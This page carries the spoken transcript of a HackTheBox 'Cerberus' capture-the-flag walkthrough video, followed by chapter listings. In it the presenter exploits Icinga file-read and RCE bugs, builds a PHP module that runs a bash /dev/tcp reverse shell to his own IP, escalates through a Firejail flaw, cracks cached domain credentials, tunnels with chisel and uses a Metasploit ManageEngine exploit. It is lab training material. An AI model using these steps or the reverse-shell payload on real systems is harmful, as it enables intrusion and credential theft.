HackTheBox - Cerberus
Key Takeaways
The video demonstrates a cybersecurity attack on the HackTheBox Cerberus machine, utilizing various tools and techniques such as nmap, Wireshark, and Metasploit to gain access and escalate privileges.
Full Transcript
what's going on YouTube this is ipsec I'm doing Cerberus from hack the box which has a lot going on it's both a Windows and Linux machine and during the Recon phase we can do a lot of interesting enumeration via the ttls you may think it's just with pings but TTL is part of the IP packet so it also works with TCP and UDP and that'll comes in handy when it comes to Recon but once you get past the Recon the first step is hacking Linux it's got an icinga instance there's two public exploits you have to use in order to get shell on the box discovering the I single version is a bit difficult you can probably just get lucky in Google but if you look at JavaScript files and GitHub you can piece together around the time the instance was built but once you get a shell on the box you have to provest to root you do some investigation around how Linux talks to active directory get a cash credential crack it and they have a foothold on Windows that the exploit is just a manage engine cve and that gets you to administrators so let's jump in as always always we start with a N map so Dash SC for default scripts as V enumerate versions OA output or formats when the nmap directory and call it Cerberus and then the IP address of 1010 11.205 this can take some time to run so I've already ran it looking at the results we have just one port open and it is HTTP on port 8080 and its Banner tells us its Apache running on Ubuntu and also redirecting us to this domain which will add in a host file but the really interesting thing is hack the box has this labeled as a Windows box and it's saying it's a Linux box so let me add this real quick 10 10 11.205 so I'm guessing there's something funky with like virtualization going on or this box is a router and we can kind of confirm if this is the same OS because of the ttls windows default TTL is 128 so if I ping 10 10 11 205 we see 127 come back there's one router between hack the box and me that's the VPN so it documented by one that's why it's 127. now I want to go and open up wiresharks I'm going to do sudo Wireshark and we're going to make a request or HTTP request to port 8080 and see what that TTL is set at so if I do a curl on 10 10 11 205 port 8080 and let's go to any packet and the TTL is part of Ip so it's in both TCP and UDP and we see the TTL is 62 and it's 62 because linux's default is 64. it decrements by two and that's because it hits the host operating system which is going to be Windows documents by one hits the VPN routed documents by one and we get to 62. so we have confirmed there is a VM running on this machine and this is a technique that I've used plenty of times whenever do it dealing with like an added services to identify if it's the same machine or not um just because the TTL could be different based upon where it is in the network and we could also do like a UDP scan so I'll do end map dash s u on 10 10 11 205 we'll do a sudo as well and then do a dash V and see if it finds any UDP ports to see if anything is listed I did a dash p dash and didn't get any other TCP ports back but I know for a fact that DNS is listening on UDP here I think odap is as well I'm not sure how long that nmap is going to take so let's just do a dig at 10 10 11 205 and we can do localhost and see the server does respond back to us um I bet we could do since we know soberost.local uh we can see the internal IP is 172 1622.1 and we have 10 10 11 205 as that so we know there's two IPS this is going to be on the virtualization Network again if we go to Wireshark and my end map is flooding it so let's um cancel that we do see it did come back as 53 open but I'm going to stop restart this just to clear the screen and I can show you when we do this UDP thing and look at the IP layer we can see time to live is 127. so again when you look at ttls it's not just about paying any packet will have them and it does give some type of information now a lot of that isn't really important for solving the machine but we can get a lot of information up front so once we know we get a shell we know we're probably going to be in a virtualized environment from this Linux machine so let's take a look at the icinga so I'm just going to go and cap my host file then we can copy this go to a browser put it in and it was what port 8080 and we get to icinga web login now the first thing I do is Google for like default Port so we'll do I sing uh default credentials not Port so default login I want to say it's like icing icinga so defaultpassword.info let's see what this says um password I sing it admin icinga so we always try defaults first they almost never work but when they do it's just absolutely golden log in and we get incorrect username or password and I did a lot of research when doing this box trying to find a way to get like the version uh sometimes you can do like changelog.md and get it um let's see if we do a single web 2 changelog.md we don't have it if I go and search this with GitHub see if there's any files here I look at maybe it's PHP or something like that I'm sure maybe I could look at like JavaScript it's loading and paste together like um what version of icinga use that JavaScript library but that is a lot more work than I really want to do um where would JavaScript even be here can I do like search star.js let's see does this have like file names I'd probably have to pull it down and search it uh maybe public there we go public JavaScript we can see helper.js was last year there's something last week here and I said I wasn't going to do this and now I just like decided to go down this Rabbit Hole so if we look at ui.js look at the history of it how often does this change uh somewhat frequently so let us see if we can find this on the actual page so if we went I sing a web 2 JS icinga so we have this now if I curl this ui.js md5 sum UI dot Js we have this as the hash so now what we want to do is find when it matches this in the repository um let's see June 22nd 2023 it is currently July 2023 so this probably came out after the box was released we can easily grab um the previous version let's see if we go to this commit I don't want history.js I want ui.js view file do raw curl Dash o ui.js md5 sum uijs and it is different so we know for a fact prop well I can't say for a fact but this is probably going to be older than uh whenever this commit was if we go back twice it'll probably tell us I want to say it was sometime in 2022 let's see history Js uh June 14th 2022. so I'm going to go ahead and clone this repo and it's been a while since I've done this but now with it cloned we can go into the repo so public Js icinga and pull every single version of this ui.js and I'm sure there's going to be a better way to do this but the way I always do it is just to get log and we can see there's uh the commits so I'm going to grep for commit and then probably want every line that begins with commit then we can awk to get the second field and then we put this in a for Loop so 4i in this command do a git checkout on this version and we specify ui.js and then after we check it out we want to do an echo dash n and then we can do the get commit and an md5 sum on ui.js and then done and now we have a list of every md5 sum for this ui.js and the git commit that it went to so if we now do an md5 sum on htb sebaris oh never pronounce that name correctly UI we can see it's one F7 I'm going to search my history for that and we can see it is this version so 9640 let's just do a get log and I don't think it's that when I thought we looked at that previously uh is that this one 964 yeah oh shoot um let's do a CD hdb this so when I um curled the raw thing I accidentally um overwrote my previous file so let's go back and grab this again so curl Dash o ui.js md5 sum this ui.js and that's a different hash 406 BB let's search our history for this and we can see it correlates to this one 5 4 ACF if I do a get log um oh I'm no longer in the get we can see this is Friday July 2nd 2021 so now we know um that this icinga version is out of date oh we have a good idea it's out of date by like two years so when we look for a single vulnerabilities um we know when to do the filter right so if we just Google icinga um vulnerability what happens if I do this uh we have a path traversal and that is May 9th 2022 so um her version is in 2021 or that's what we think so it makes sense that we could go to this one and it may be vulnerable and what they're doing is a curl on let's see icinga.com demo lib PHP so we have to find where third party is so I'm guessing if we look at us when I sing a web 2 right so what if we just do I sing a PHP third party Etsy host and I'm actually going to send this over into burp Suite so I'm going to copy this go proxy intercept is on refresh go to repeater tab and I'm going to specify this we get a not found so we just have to figure out exactly how to get to this third party thing maybe it's lib then icinga so I'm going to copy this lib isinga and we got the host file and we can see DC dot uh Cerberus or kerberos.local um we could get like Etsy hostname would be another thing we can get the hostname of icinga so now we have a file read vulnerability I'm guessing this is like anything after this argument it's loading some file and it's just doing essentially an F open command I'm sure if you read this whole uh post we can see file get open uh file get contents on file path so maybe the vulnerability to make more sense if you read the full blog post but I'm not going to go over it it looks like it does a file open on everything after I sing a PHP third party which leads to um this we can try a PHP filter which would be crazy if it works uh convert Dot base64-in code slash resource equals uh 404 not found so we can also try URL encoding this just to be safe but it doesn't look like we can do a PHP filter so let's see the next step would be trying to find configuration files so I'm going to Google uh let's turn grip Suite off and let's say I sing a web uh configuration files we have this configuration configuration let's see I wonder if I can specify database so if I sing a web I'm going to do change database password this gives an authentication so if we look through all of these we see config.ini and um config ini and resources ini and it's an Etsy I single web 2 by default so I'm going to try this real quick so Etsy a single web did I copy the whole thing Etsy I single web 2. and we wanted config.ini and we do have it so this doesn't look like anything that interesting to us let's try resources.ini then roles and Authentication so let's go to resources and we can see a single web 2. username Matthew and the password of a single web password 2023 so I'm going to go back and let's try um logging in so Matthew put in this password and we get logged into icinga and if we had kept reading this blog post uh the one where it talked about the lfi it also has a remote code execution for authenticated users that can edit resources on it and what they're doing is editing a resource it has to be the SSH resource and they drop a PHP file and the reason they can do that is because of a null byte so the other thing is we have to have a valid certificate so instead of going through and uh reading this verbatim let's just do a demo and hope the demo gods don't get to us so I'm going to go to configuration um let's see where is resources is it application resources create a new and we need the SSH identity the name doesn't matter and then for the user this is where the lfi comes in so we're going to put a bunch of dot dot slashes I'm going to go to Dev shm and we'll do ipsec.txt and if I put just a string here if we do test we get say SSH key is invalid um we may be able to actually drop an sh key but keep in mind Port 22 isn't open to us so that's why we want to drop a PHP file so the next thing to do would be gender create a SSL key or RSA key so open SSL gen RSA Dash L key.com 10 24 bits um just cut this we can grab it and as long as we have the key here it works so now we have a resource it's in Dev shm ipsec dot text so let's go back to burp suite and we will read ipsec.txt and we can see the file here now this was a file git contents so it's not a include so we can't just execute files um additionally if we tried doing let's see like verb dub dub dub uh if we do verge of the dub HTML index.php we see a file here so if we wanted to try to write a file to let's say test.php I don't think we have permission uh we can validate that real quick so let's create a new resource SSH okay another one instead of that we'll do HTML uh what did I call it test.php and we just need a key I'm not going to bother putting a file here very good thing let's see we error out uh on create I'm guessing this is because we don't have permission to the file it's probably only writable by root so what they do is um create a module so by default I single loads modules out of user share icing a web 2 slash modules which is also only writable by root but we can change the module path to be Dev shm and then create a I sing a module in this directory the other trick where they had the null byte let's just go over that really quick null byte is The Terminator for a string so if we can sneak the null byte in we can get it to just read the PHP file and not the SSL certificate or the RSA certificate um which will let a module work if there are State certificates in the module then I think it actually fails so that's why we need this so I'm going to go back to Dev shm and we also need to test if it will create a directory so we're going to put it in Please Subscribe slash ipsec dot text we'll do um it's like yeah we'll do ipsec.tax that's fine I'm going to do hip SEC was here put in the key and now I'm going to intercept this request so I'm going to go to burp Suite um turn proxy on Save changes and we have the key here 0d 0a is a new line so I'm going to put percent zero zero so we have a null byte here so on a file like if it's just reading it chances are it's going to terminate here and everything afterwards will get dropped um it's critical that the null byte is ignored though when it's checking to make sure the RSA key actually exists right so I'm going to for this and we see no error message that's actually weird I didn't think it would go back to this page um but let's go to repeater and see what happens so if we do Dev shm Please Subscribe ipsec dot text we see ipsec was here and if I highlight this we can see a null byte is actually in it um I guess we can look at hex as well so let's see whereas ipsec was here we see the zero d0 a and the null byte is here so now the final step is just to look at how icinga modules work so if we do I single web modules let me make sure brip Suite is off and let's see oh eight modules let's see I'm going to add GitHub to this see if we can find an example module okay if we look at configuration.php I think we can just put PHP code in a folder and call it configuration.php I don't think we need all this metadata maybe run.php works as well but let's try this real quick so I'm gonna go back to my proxy tab let's go resources create a new I'm going to do file resource name uh we'll go and say does not matter I was going to say it's something with the module but you don't actually need that it's actually SSH identity and I'm going to call this module um malicious and we'll do configuration.php so now we can just write a PHP shell so I'm going to do system and then let's get a base64 payload we could probably just grab the PHP module but that's going to be really big and I want to be effort on size um if you're curious about the PHP module I'm talking about it's like PHP reverse show it's like hundreds of lines but I'm just going to do Echo dash n then we'll do bin Bash uh is it Dash I Dev TCP 10 10 14 8 9001 zero and one base64-w0 and we don't have any special characters that is good so we'll do Echo dash n base64-d pipe it over to bash and then we want to put the certificate so we'll do key or that certificate the key I guess copy paste so I think this is good I'm going to close out the PHP leaving open tags just upsets me so we're going to turn intercept on we're going to save changes going to intercept this 0d 0a we're going to put the null byte there I'm going to forward the request and then if we go to the modules we don't see a module here but if we change the module to Dev shm save changes go to modules we have Please Subscribe and malicious so I'm going to do nclvnp 9001 I'm going to click on malicious and we got a shell so it executed our module right there so let's do a python 3-c import PTY pty.spawn Ben Dash then sdty raw minus Echo FG and then export term is equal to X term before I begin trying to do any type of prefask I'm mainly curious what type of virtualization environment I'm in if I'm even in one my first step is to look at the root director to see if I see like dot Docker environment and I don't I think it's just dot Docker M um I can also check like uh let's see Dev is that proc CPU info to get like the CPU that's like my next step and this looks like non-vm type of thing like I just see the AMD processor the other place I look at is uh DMI so this is going to be sys class DMI ID if we look at product name we can see virtual machine so we definitely know we're in some type of virtual machine and let me fix my TTY let's do stty Dash a rows 121 columns 31 so s t t y Rose 31 columns 121. okay so if I do an LS on this we have a few things we could do like buyer's vendor it's probably gonna be Microsoft uh I did LS American Mega Trends that's not what I thought um let's see what else was there there's chassis so if you do chassis vendor we get Microsoft Corporation if we do CIS vendor if I can be Microsoft as well so I'm guessing when hyper-v or like just the default like Linux on Windows um if I open a new tab and do catsys class DMI ID product name we can see VMware um was the other one we did chassis vendor no enclosure let's do CIS VMware right so that would be how you could identify what type of environment you're in so that's not really important um I think limpy's actually says it's not in a virtual environment but I digress um we could run Lin peas and that would tell us everything we need but the two things I generally run when I'm dub dub dub data I normally don't bother with sudo because we don't really know the password I guess we could um CD Etsy was it a single web 2 and then cat resources we could try the icing a web password 2023 but really www data should not have a password release set to it we can't Etsy pass WD for everything that ends in sh [Music] um oh dollar sh there we go there's only oh there is at Matthew we Su Matthew put in that password authentication failure and that is the correct password so we're kind of at a dead end right now can we go in Matthew's directory we can so the first thing I generally look at is a PS output so if we do PS Dash ef- Forest uh less is not found weird let's just go to the top and we go down and this is where we start having processes the first thing we see is sssd and this is going to be some way for Linux to be able to authenticate against windows so we see the domain uh cerberos.local we have uid 0 gid0 so that's going to be root so we can't really get into this configuration if we get in this configuration we may find like domain credentials or something but that's going to be owned by root so keep that in the back of your mind and we can look for anything else there's a lot of www processes there's our reverse shell uh redis we can go in like um MySQL and dump credentials uh we can also look at set uid files so we'll do fine Dash perm Dash 4000. type errors to Dev null and we have a couple things I don't recognize CC creds check PWD if we execute it and it says this binary is not designed to be running this way the admin has been notified I did control Z to background it we also have fire jail which is not default so these are the two binaries that stick out I'm going to execute fire jail and let's see PID it looks like we just put ourselves in a jail so we'll exit to get out we can do fires jail dash dash version and we see firejail version zero nine six eight release candidate one so I'm going to Google this with fire jail and I'll add exploit to it and we see a posting that says on seclist local root reachable via dash dash join logic and unprivileged user can fake the system and have fire jail essentially attach to an environment you create which allows you to get root so I'm looking for a POC do we have one let's see go here GitHub fire JL these are commits so let's go grab this cve GitHub let's see local root let's do PRC fire jail advisory python fire jail join SEC list I don't think it's in advisories so I think on the very first Google search result um this is someone's oscp guide and this does this one have it nvd release notes I don't see a POC I could also be blind an osep cheat sheet fire jail this looks like it and it's a python script so firejail LPE so let's copy this does this have instructions so we execute it it says you can now run follow JL join so we need two terminals to do this so the first one we run this python script and I'm guessing it holds this terminal open and then we run the second one so I'm going to copy let's just go Dev shm V firejail Dot pi oh God is it going to make me oh man it's been so long since I use Nano hopefully I can exit it uh control X Save Right did it have Vim it did not have them okay I would have been really upset so now we have firejo.php dot Pi um do we have tmux in this do we have screen we don't have either so we need to get a another shell so let's do nclvnp 9001 I could probably run it with like an ampersand but I'd rather just do a full new terminal um let's go back to modules click malicious no such module installed let's add Dev shm back here save changes modules malicious got a show import PTY PTY spawn then Bash oh shoot python 3-c input PTY pty.spawn then Dash sd2y raw minus Echo FG Okay so let's do python3 firejail.pi I think that's what it's said to do they call it bin but that's fine uh 50. Pi needs to have the execute bit chmod plus X okay so I can now run fire JL dash dash join equals 2046 and we do ID we are not root oh pseudo Su Dash let's just do SEO there we go um so I guess it just gave us the Su token so let us now export term is equal to X term then s TTY Rose 31 calls 121 I think that's what the variables were from earlier anyways now that we're root we can go into the active directory files on this box right if we do ps-ef forest and then look at sssd we saw this earlier but we couldn't access any of the files because we weren't root um we can also probably go into Matthew's directory to see if there's anything there sometimes when you get like root privileges it's not always about going higher in privileges but you users privileges to go lower and pillage information but that's not the case here we want to go into the active directory Linux stuff and there is a hat tricks page so if you do hat tricks active directory Linux um let's see we have a whole page of things we could be doing here and it talks let's see if we go down a cub Rose tickets and temp my browser was like freezing a little bit so if I do LS temp I don't see any care b files um where was it talking about them let's talk about them here so we don't have any active I don't want to put any tools on the machine yet and it's looking at uh let's see k-list man I don't know what just happened to my browser but it seems to behaving now um I could swear there's SSD here talking about oh there we go so we got uh secrets.odb and secrets.me so I'm going to try this m key first so if we do strings on this file it doesn't exist we can try a strings on this file and then grep for everything that contains a dollar sign because that's going to be how the hash is stored we don't have anything here so let's go Etsy sssd is that where it is comfy nothing there we can't this config we see cache credentials is true so we want to figure out where these cache credentials are so I'm just going to go Google sssd cache credentials and domain option enabling offline Authentication and let's see does this say where they're stored I don't think this page does let's see I don't think I can find the page that I was looking for but I did a lot of research when solving this box around the cache credentials to see how it works and I think it's in VAR lib sssd where were the other files at that we looked at we're like m key CD VAR lib SSS then DB and we have this cash credential or cash Kerberos local ldb so if I do a strings against this file so let's just do a strings we have this hash I wonder if I do like a dash B1 or we need to grab Dash B1 my bad we'll do B5 A5 to go four lines before and four lines after see we can see information about the account maybe we should do 15. groups curb roofs it's probably going to be Matthew's password because we can see Matthew at cobros.local so let's grab this and then I'm going to go over to the Kraken which is just a machine on my network um you can crack just on your host machine if you crack in a VM it's probably gonna go slower than you wanted to so I'm going to do V uh call this could Bruce and then hash cat hashes this and we'll do opt word list Rock U dot text and see if this cracks and I don't have to specify the hash mode because hashcat is an auto detect mode and it looks like it has cracked it so if we go up we can see the password is one four seven two five eight three just a string of numbers definitely doesn't meet password complexity um let's see is that the same password Here for Matthew I wonder I never thought about that when I was solving this box I went to the sssd because I noticed that was running it went straight there um I wonder if it's the same password I doubt it is uh V put this in there's probably an open SSL command we can run to verify it but if it doesn't crack instantly I'm gonna assume it's not the same password so give it probably another five seconds and at this point it had cracked the first time so um not the same password and the shadow file I'll just leave that running for good measure but we have Matthew's password and we don't know exactly what it goes to but remember we're in a virtual environment if we counted Etsy Hurst or we did the um dig so dig at 10 10 11 205. uh what was it curbrews.local is what we did at the beginning we can see the DC is 172 16 22 1 which does match so what I want to do is forward my connection here so let's see I'm going to see there's no SSH exposed here I could either use chisel to afford SSH and do an SSH tunnel or I can just upload chisel here and tunnel to the domain I think that's what I'm going to do because I highly doubt like Evo winner M or let's see is there nmap there is not um let's see Echo is this last exit code Echo one that's Last Exit code so let's do Echo one two Dev TCP 172 16 22 1445 and then Echo like this guessing that's a timeout foreign let's try was it 59 85 is when RM so that port is open 59.86 is not but it looks like winter m is open at 59.85 so we want to tunnel to this port if you don't know what I'm doing here um I can probably do a timeout one will that work God timeout one Echo One Mississippi it should be done I guess the timeout doesn't work with redirection that's annoying but this is just testing if a port is open through bash um and we can see since I can write one to this websocket or I shouldn't say websocket this TCP socket and it's executed zero which means success we know that port is open but I spent too long talking about that when we just want to get chisel on this box so do I have chisel I do uh let's do Python 3 Dash M HTTP server let's go in root wget 10 10 14 8 8 000 chisel and we are downloading chisel now okay so over here I want to run chisel and server mode so chmod plus X chisel um sudo there we go and now we can do chisel server reverse socks five we need to specify the port we'll use 8001 since burp Suite is using port 8080 and let's go over to all right sing a box we can do chmod plus X on chisel go in client mode and then we want to specify uh 10 10 14 8 8001 R colon sucks to tell it we want a socks proxy and we should see a ton address open up so we have a socks listening on 1080. so now if I do a proxy chains and we can say NC 172 1622.1 I think is the point 59.85 and we'll add a zv we can see the port is open so let's do evil when RM Dash I 172 16 22 1 don't forget to proxy chains it um Dash U the user of Matthew Dash p we want to get the password and we see hashcat did not actually crack it when we had the shadow file in we'll do dash dash show so we get the password and see if this works um you have a winner I've not found I could have swore I installed evil went around gem install evil winrm let's do sudo I have to figure out exactly why that's not installed uh let's see I'm going to fix these issues um if you're curious what I'm doing if you go to github.com ipsec parrot build there is a ansible script in here that I use to install winrm then I guess I just had commented out it's probably under install tools tasks uh let's see gem tools this is it so I install all these gems packages so I'm going to do that just offline so I don't waste five minutes of your time okay I have ran a gem install against every one of those packages so now when I do a proxy chain the command actually works and we get a shell as Matthew on the domain and following the logic of the last one we could run win peas but first why don't we just try like running git process and see what sticks out to us so I'm going to run it and then let's just go down the list we have search serves or maybe we could do some type of certificate attack this is a domain control I believe because we did see um DNS running we have a postgres server so we could potentially go and exploit this SQL Server as well it's weird that we have two databases and one of SQL Server I think that's Microsoft SQL um we also have Java so there's a lot of applications that are installed here SQL Server can also be a binary in the postgres thing it doesn't have to be um Ms SQL but for some reason I think it is let's go to CD program files let's put that in quotes do a dir and see if there's anything non-standard so we got common Google um what is Google is this just Chrome we have Chrome Internet Explorer VMware WinRAR so nothing really there let's do CD program files x86 dir nothing too interesting here oh wait um we have manage engine so let's go in manage engine we got 80 Self Service Plus is there anything interesting here I was hoping to get like a version out of this there's probably a version maybe in comp there is PG SQL so that's definitely going to be postgres um let's see type server.xml we see files 10 21 2022 so that is relatively old version string version [Music] I don't think this is it let's see let's do your search point manage engine I don't have searchpoint installed we can install it I'm just going to go to exploit DB how to figure out what package that is and add it to my build um let's see manage engine let's see self-service Plus hash exposure user enumeration self-service rce unauthenticated what is this cve ID Central file storage and not much is sticking out at me I really hate how many products manage engine has because I just want like the self-service ones see does that do anything we have ntlm hash exposure that may be useful I just tried adding a space to see if that changes anything um I don't see anything I'm gonna try msf DB run CF Metasploit has anything occasionally you do find things in Metasploit that's not in searchpoint and I know manage engine stuff almost always ends up in Metasploit eventually and well the UI changed since I've last used it I've never noticed jobs and agents before but let's search manage engine and I always go to the top 2023 and this is 80 self-service plus so I'm going to do a use five I'm just starting with the newest one we can show options here let's see what what does this talk to 9251 so we have to get to 9251 well to figure out the issuer URL and the saml endpoint good so the first step is getting 2.9251 let's see if we go here actually I'm just going to do a proxy change real quick so proxy chains 172 16 22 1. we need to netcat zv and 9251 and I'm just gonna see if it's going to be that easy where we can just um use your existing tunnel doesn't look like it though let's see where is chisel running here I don't think I have the web server open anymore so let's do python3 Dash M HTTP server um I meant to do LS first so you can see there is a chisel EXE so when we go back to our Powershell I'm gonna go and program data oh crap um I killed the tunnel which killed my win or M session we don't want to do that so let's run this again program data okay then let's see op chisel python3 Dash M HTTP server and we can W get 10 10 14 8 or 8 000 chisel.exe Dash o chisel.exe um if this didn't work if the W get for some reason doesn't download it I can use like when RM or Eva winner M's default upload function but I have more success with wget than I do with the upload function because I want to say it works by like converting the binary into base64 and then using the standard end to pipe it into the application which it is buggy um so let's just do chisel exe make sure we can run it it looks like we can so we can do client reverse uh no we want client 10 10 10 14 8 Port 8001 are socks we'll stand up another chisel tunnel let's see where is this one listening we only have one so far what port did I do did I do the wrong Port 8001 this is Port 8001 I don't know why it's not connecting to me so chisel EXE that works client 10 10 14 8 Port 8001 doesn't want to be lowercase that'd be bizarre let's see not specified run this again and I'm gonna give it like 10 to 15 seconds I don't know why it's not connecting to us I'm kind of curious if it's because we already have an instant like a ton adapter open see I'm we could always um not do the reverse socks and listen on a local host so I'm going to control C to close chisel and then we can do a reverse nine two five one four to two Local Host on nine two five one I think that's the port we use go back here and we have this one open so I think it's only one socks at a time would be my guess so hopefully this exploit only requires us um using one port not allowed um is it nine five two one let's see here's this no 9251 oh we're proxy chaining there we go so if I go to 127001 9251 bad request it needs TLS so let's do https accept the certificate and it's transferring data show login I'm going to look at the network tab and it aborted why did it stop wait ing more thanks it's trying to show login calling authorization.do and it tried to go to dc.serberos.local so let's do sudo V Etsy host and add this and we want to add it to 127001 save it I'm going to turn burp Suite off did I typo it I thought I'd copy and pasted it unable to connect I wonder if it's cached curl uh let's see nine two five one Okay so it redirected me to Port 443 I just noticed the port is missing adfs LS um I think that was one of the options we need is the issuer URL which I think is going to be to be this right here uh let's see 9251 Advanced we'll accept this and see if it actually loads it needs 443 as well so what I want to do now is I'm going to see if I can get winrm working without the reverse socks and then we will use reverse socks for the windows tunnel this is an odd issue so let's close this what is this tunnel so we'll do 127001 here we can load this up and then we go to our SSH session here and we can do reverse 59.85 127001 actually we want 59.85 redirected to 172 16 22 1. that's the DC's IP okay evil 1rm Matthew see if we log in uh we don't want proxy chains anymore okay we have a shell so let's go to program data and then we can do dot slash chisel.exe uh client 10 10 10 14 8 Port 8001 are socks and hopefully we can get a reversed established uh we have tons zero listening so that's looking better so let's go into a host file and we can get rid of DC kerbros and we can put it here so let's do DC Kerberos local okay and in here we will need to use another proxy um let's see where is ADD we want to add sox5 127.001 port 1080. proxy type sucks five save actually I'm going to change let's not send DNS through the proxy and we can do https um DC Dot this and hopefully this one now works does not look like it is though let's see sudo NC zv oh we don't want to do pseudo we won't do proxy chains and then DC Kerberos local 9251 why is it going to four two two let's do um 1010 110. what's the other octet oh not 110 it is 127001 okay that works so if this works it's going through the proxy so 127.0019251 that's definitely not my box right nine two five that could be my box there's still a chisel running forwarding localhost oh man so we got two ways to get to this box that is messy oh I have burp sweet I didn't click socks so let's go advanced accept the risk authorization this adfs we should now be able to hit it because we're going through socks there we go um the trick was making sure we selected socks five after um configuring the proxy so now we want to log in as Matthew at kerberos.local and his password that is on this tab paste it in and then it tries to go to DC so let's add another host V Etsy host DC save resend except this SSL shirt and it's hanging and we just have this saml login and then this hash and I think this hash is what we need for the exploit so let's go back here and we'll try this so set guide to this then we want to set issue a URL um let's see what was that other one we did let's see adfs issuer URL this should always be the same and I gotta turn the proxy off to do that adfs issuer URL so it's ADF fast Services Trust I think is that right let's try it https um DC we gotta make sure we spell this correctly because that does matter paste that then adfs Services Trust okay see we have that our Port SSL Target URI saml login we need to set our host so set that's going to be pretty much the same thing as issue or URL okay so we set the good we set issue URL we have our host 9251 see Server host we need to set server Port let's do 8082 see payload meterpreter that's fine set L host to be ton zero uh set serve Hurst to also be ton zero 10 10 14 8 and then I think we set reverse allow proxies to true and then we set is there a Sox five um so proxies proxies let's see Metasploit set proxies sucks I don't know this Syntax for this set proxies stocks five colon so Sox five colon 127001 port 1080. and then we run and we may want to set auto check to false so set auto check false we run again and we'll see if it actually exploits if it doesn't exploit I'm going to look at that saml URL first because I want to say there was one we were looking at before it was um slash LS not trust oh um it could also be HTTP not https uh let's go back to where we allowed it or created it that's our host let's try http run and there we go we got sending stage so that definitely looks promising and we have an interpreter One open and wow this is different do I have just okay I thought it was in like a CMD prompt already but if we do get uid we are anti-authority system so we can use users CD slash there we go users administrator then desktop and root.text um I'm guessing where's users.txt do we ever get that is it just in Matthew uh desktop yeah so user.tex is on the Windows Service as well so hope you guys enjoyed that video um sorry for all like the screwing around with the tunnel stuff that was different I did not expect to run into all those issues so um the trick was we had to make sure we did a um Port forever a reverse port for it on Linux because this only opens Port 59.85 right that's the only part we required for Linux and then when it came down to the windows we wanted to do a reverse socks because we had to forward Port like um 92 or that weird manage engine Port like 9251 or something we needed a port 80. who knows what other ports we needed but that's going to be the video take care guys and I will see you all next time
Original Description
00:00 - Introduction
01:00 - Start of nmap
02:00 - Looking at the TTL of Ping to see its 127, then making a request to the webserver and seeing it is 62
03:45 - Showing DNS is listening on Cerberos and exposing the 172.16.22.0/24 network
05:15 - Looking at Icinga, testing default credentials
06:20 - Fingerprinting the Icinga release by looking at javascript, using UI.JS since it looks like it changes frequently
09:05 - Cloning the repo, then writing a one-liner to hash all versions of ui.js and finding which commit the version off the webserver is on
12:10 - Finding a File Disclosure vulnerability in Icinga CVE-2022-24716, leaking some Icinga configuration files and finding a web users password
16:20 - Gaining RCE via CVE-2022-24715, which allows us to write a file to disk then change where the Icinga plugin directory is to get code execution
25:30 - Shell as www-data, doing some basic recon to figure out what type of virtual environment we are in via /sys/class/dmi/id/sys_vendor
29:00 - Looking at running processes and seeing sssd is running which allows this box to talk to the domain
30:00 - Looking at SetUID Files, discovering FireJail and privesc'ing CVE-2022-31214
36:00 - As root on linux, we can now examine the SSSD configuration and get a domain password
44:50 - Setting up a SOCKS Proxy via chisel, so we can use Evil-WINRM to log into the windows machine as Matthew
48:50 - Discovering ManageEngine ADSelfService Plus is running, finding an exploit
52:50 - Fighting with Chisel to get all the port forwards working, have trouble with two socks proxies
01:00:00 - Redoing our tunnels, doing a portforward on linux to get evil-winrm, then a socks on our windows target to access ManageEngine
1:06:10 - Running the Metasploit Exploit against ManageEngine and getting root
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Security Basics
View skill →Related Reads
Chapters (18)
Introduction
1:00
Start of nmap
2:00
Looking at the TTL of Ping to see its 127, then making a request to the webser
3:45
Showing DNS is listening on Cerberos and exposing the 172.16.22.0/24 network
5:15
Looking at Icinga, testing default credentials
6:20
Fingerprinting the Icinga release by looking at javascript, using UI.JS since
9:05
Cloning the repo, then writing a one-liner to hash all versions of ui.js and f
12:10
Finding a File Disclosure vulnerability in Icinga CVE-2022-24716, leaking some
16:20
Gaining RCE via CVE-2022-24715, which allows us to write a file to disk then c
25:30
